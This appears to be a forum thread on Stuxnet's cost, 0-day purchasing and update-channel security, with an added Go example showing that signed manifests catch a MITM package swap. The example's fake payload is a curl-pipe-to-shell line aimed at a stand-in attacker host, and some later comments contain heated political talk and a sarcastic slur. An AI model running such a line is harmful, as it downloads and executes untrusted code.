Reverse engineer how something like this was created and it is mind boggling. The initial intelligence gathering on the target systems, developing the plan of attack, recruiting experts on the Siemens hardware and physicists to explain the things that could go wrong; development and QA must have been grueling, since the expense of failure is so great! Never mind the deployment and monitoring to see if it was effective! They probably recreated the entire environment to test different ways to cause havoc.
Stuxnet recorded various data points while the cascades and centrifuges operated normally, in order to replay this data to operators once the sabotage began. They must have had a working system to test this on?! The budget for something like this is probably in the tens of millions if not more. The HR requirement must have been pretty large too. Analysts to gather information, managers, programmers, qa, siemens hardware experts, physicists, deployment, monitoring, etc, etc.
> The budget for something like this is probably in the tens of millions if not more.
Absolutely. This was a massive defense spending project by any measure. How many people do you think worked on it? Assuming the project was highly compartmentalized, I would estimate that there are at least SIX subteams currently working on the next Stuxnet.
- 0-Day exploitation of PCs. How big is the team responsible for discovering / purchasing 0-day exploits?
- Hardware/firmware-level infection. This would require expert knowledge of the specific control systems.
- Networking / infrastructure. This requires an intimate knowledge of target network topology.
- Spear-phishing payload delivery. Perhaps the points of entry were several levels removed from the actual target facility (e.g., security guards' wives' laptops).
- Testing / QA.
All of this of course has to be backed up by world-class intelligence support, which I shan't address further. The technical feats of developing this alone are astounding and intriguing.
> 0-Day exploitation of PCs. How big is the team responsible for discovering / purchasing 0-day exploits?
Given the speculation that it was the US behind Stuxnet, this one is a cheap and easy one. The US has been buying up ready-made exploits for a good while now (there's a reason that the likes of Raytheon are hiring exploit devs left and right) and have nice stockpiles of them just ready and waiting for the likes of Stuxnet.
This is true because you heard it's true, or because you know it's true? Raytheon definitely has a lot of people on staff who are at least peripherally involved in vuln dev. That's not the same thing as having a staff full of exploit developers. You get peripheral involvement in vuln dev just by doing malware reversing, which is pretty low on the food chain, and something the government definitely (firsthand) spends money on.
I can also confirm that Raytheon is building up this capability (although less so than Northrop and Lockheed).
If you're curious what companies are actually committing to vulnerability dev you can search any cleared jobs site for "offensive"; the companies that have listings are who you'd imagine them to be (minus a couple placement firms that just put people right at the Fort).
At least three different people I know are significantly involved in that area. You probably know some of them too. I detest them for the ethics of it, and keep my distance as a result, but there's no question what they do and where the money comes from.
But that would still make it quite a bargain compared to buying physical weapons systems (not to mention the greater deniability / diplomatic two-steps it enables).
Exactly. "Tens of millions" sounds like a lot, until you realize that's not that much. Most 50-employee companies could make an investment of 10 million if they really had to.
What's going to happen when the first Chinese/North Korean/... company succeeds at actually doing this? When will we have the first startup doing it? Startups are known for creativity, both in technical development and in interpretation of the law, so why not?
The cost for things like this needs to go up, by a lot, fast. Or we're going to be in a deep hole.
In the David Sanger article published in the Times attributing Stuxnet to the US/Israel, this bit really struck me -
"One day, toward the end of Mr. Bush’s term, the rubble of a centrifuge was spread out on the conference table in the Situation Room, proof of the potential power of a cyberweapon. The worm was declared ready to test against the real target: Iran’s underground enrichment plant."
And i don't mean to stray off Stuxnet here, but just really quickly: The chosen-prefix collision attack used in signing the Windows Update malware (FLAME) also suspected of being from the US was a never before published variant.
The computing power alone was on the order of $200k, and makes you wonder what else the NSA or the national labs have up their sleeves.
> The chosen-prefix collision attack used in signing the Windows Update malware (FLAME) also suspected of being from the US was a never before published variant.
Is anyone aware of a somewhat comprehensive auto-update cryptography survey anywhere?
I am often alarmed by the number of updates pushed through desktop software, often with little explanation. (I'm looking at you, Adobe.) .. not just for security, but for bandwidth management too.
Many open source products seem to just query a URL and direct you to go download stuff. With SSL essentially broken, that's gotta be a bit risky vs. MITM.
Gentoo for one combines pre-distributed SHA256, SHA512 and Whirlpool checksums with file size, which feels secure enough against collisions. But the pre-distribution is decentralized through potential MITM (non-trusted parties), the cryptography around that process - if any - is less than transparent, and integrity checking is apparently not performed on the locally extracted package database.
Perhaps we need a standard, cross-platform solution in the software update query space that is cryptographically paranoid and well-reviewed enough by multiple parties to be considered secure, meets the generalised need and has some OS-level integration features more advanced than "secretly do things in the background".
> Many open source products seem to just query a URL and direct you to go download stuff. With SSL essentially broken, that's gotta be a bit risky vs. MITM.
There's nothing stopping one from linking against their own copy of an SSL lib, and supplying their own list of trust anchors/trusted CAs. I've been wondering for a while why lots of apps (e.g. mobile apps) don't do this more often.
I believe the best way to do it is something like ECDSA to verify and sign update packages - but I'm not familiar enough with the crypto field to understand how the entire mechanism works.
Sure, signatures are ideal. The problem for distribution maintainers, I guess, is that really they can't sign off on things; only the actual package developers can. Further, you'd wind up providing a key distribution service which may rapidly become more complex than the software packaging itself.
Given the above, perhaps all distribution maintainers can realistically do is say "it hasn't changed since I first saw it" which is what happens when they provide multiple checksums of a file, which is probably lower CPU and software library overhead than performing a cryptographic signature check.
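The difference the two comments above are circling (a checksum says "it hasn't changed since I first saw it", a signature says "the publisher vouches for it") is easiest to see with a MITM who controls the download channel. The following is an added example, not code from any of the posters or from Gentoo: it builds a hypothetical Gentoo-style manifest (size plus SHA-256 and SHA-512 of the file), signs it with an ECDSA P-256 key the publisher keeps offline, and has the client verify against a public key pinned in the updater. The package contents and the manifest layout are constructed for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/sha512"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is the metadata a distribution publishes for one package:
// file size plus two independent digests. Hypothetical layout.
type Manifest struct {
	Name   string
	Size   int
	SHA256 string
	SHA512 string
}

// Canonical renders the manifest in one fixed byte layout so that the
// signer and the verifier hash exactly the same bytes.
func (m Manifest) Canonical() []byte {
	return []byte(fmt.Sprintf("name=%s\nsize=%d\nsha256=%s\nsha512=%s\n",
		m.Name, m.Size, m.SHA256, m.SHA512))
}

// NewManifest computes the size and digests of a package blob.
func NewManifest(name string, pkg []byte) Manifest {
	h256 := sha256.Sum256(pkg)
	h512 := sha512.Sum512(pkg)
	return Manifest{
		Name:   name,
		Size:   len(pkg),
		SHA256: hex.EncodeToString(h256[:]),
		SHA512: hex.EncodeToString(h512[:]),
	}
}

// ChecksumsMatch is the "it hasn't changed since I first saw it" check:
// size and both digests must agree with the manifest. It says nothing
// about who wrote the manifest.
func ChecksumsMatch(m Manifest, pkg []byte) bool {
	got := NewManifest(m.Name, pkg)
	return got.Size == m.Size && got.SHA256 == m.SHA256 && got.SHA512 == m.SHA512
}

// SignManifest signs SHA-256(canonical manifest) with the publisher's
// ECDSA P-256 key; the signature is ASN.1 DER encoded.
func SignManifest(priv *ecdsa.PrivateKey, m Manifest) ([]byte, error) {
	digest := sha256.Sum256(m.Canonical())
	return ecdsa.SignASN1(rand.Reader, priv, digest[:])
}

// VerifyUpdate is the client side. The public key is pinned in the
// updater itself, so a MITM on the download channel cannot substitute it.
func VerifyUpdate(pub *ecdsa.PublicKey, m Manifest, sig []byte, pkg []byte) error {
	digest := sha256.Sum256(m.Canonical())
	if !ecdsa.VerifyASN1(pub, digest[:], sig) {
		return errors.New("manifest signature does not verify: reject update")
	}
	if !ChecksumsMatch(m, pkg) {
		return errors.New("package does not match signed manifest: reject update")
	}
	return nil
}

// Scenario models an attacker who controls the download channel and
// replaces both the package and the checksums it ships with. It returns
// whether the genuine update verifies, whether the swapped package passes
// a checksum-only check, and whether the signature check rejects it.
func Scenario() (genuineOK, swapPassesChecksums, swapRejectedBySig bool, err error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return false, false, false, err
	}
	// Constructed sample data: the real package and the attacker's replacement.
	genuine := []byte("#!/bin/sh\necho installing widget 1.2\n")
	evil := []byte("#!/bin/sh\ncurl http://attacker.invalid/x | sh\n")

	m := NewManifest("widget-1.2", genuine)
	sig, err := SignManifest(priv, m)
	if err != nil {
		return false, false, false, err
	}
	genuineOK = VerifyUpdate(&priv.PublicKey, m, sig, genuine) == nil

	// The MITM serves a fresh manifest whose checksums match the evil file,
	// but has no way to sign it under the publisher's key, so it replays
	// the signature from the genuine manifest.
	evilManifest := NewManifest("widget-1.2", evil)
	swapPassesChecksums = ChecksumsMatch(evilManifest, evil)
	swapRejectedBySig = VerifyUpdate(&priv.PublicKey, evilManifest, sig, evil) != nil
	return genuineOK, swapPassesChecksums, swapRejectedBySig, nil
}

func main() {
	ok, cs, rej, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine update verifies: %v\n", ok)
	fmt.Printf("swapped package passes checksum-only check: %v\n", cs)
	fmt.Printf("swapped package rejected by signature check: %v\n", rej)
}
```

The checksum-only path accepts the swapped package because the attacker rewrote the checksums alongside the file; only the pinned-key signature over the manifest catches it. The extra CPU cost the comment above worries about is one ECDSA verification per manifest, which is negligible next to hashing the package, and the key-distribution problem reduces to shipping one public key with the updater and planning for its rotation.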
"Just as easily"? With what budget? The United States has a crumbling infrastructure and is a few days away from massive, across-the-board funding cuts that will touch all corners of government, including defense. Sabotage is not only the best-priced solution, it's the only solution the country can afford in the current political climate. The US is trying to wind down its wars, not start new ones.
They might also think about bombing the US because they don't want an "atheist capitalist state" to have nuclear power. This kind of non-argument can go both ways.
Only if you think that a free liberal state like the US, and a theocracy like Iran where (for instance) they hang people for being gay is in any way morally equivalent.
That's the kind of thing that ensures that an Islamic ally with the MAD principle kicks in and fights back. This is ignoring the side effect that any damaging nuke would send fallout over the entire middle east, including Israel and other allies.
I was under the impression that the US started this war with their questionable military efforts abroad?
Pretty sure the US armed a lot of the terrorists in the first place. When you suck the resources out of the world and push people into starvation whilst living in the land of plenty, you're obviously going to become a target.
There are millions of Muslims representing hundreds of view points.
"All Christians are homophobic retards." What? There's nothing wrong with that statement. It describes those Westboro morons and therefore can be extrapolated to every Christian, right?
> They must have had a working system to test this on?!
The speculation is that Stuxnet was tested on P-1 centrifuges that the US acquired when Libya dismantled its nuclear program, set up in Israel's nuclear arms facility in Dimona. [1]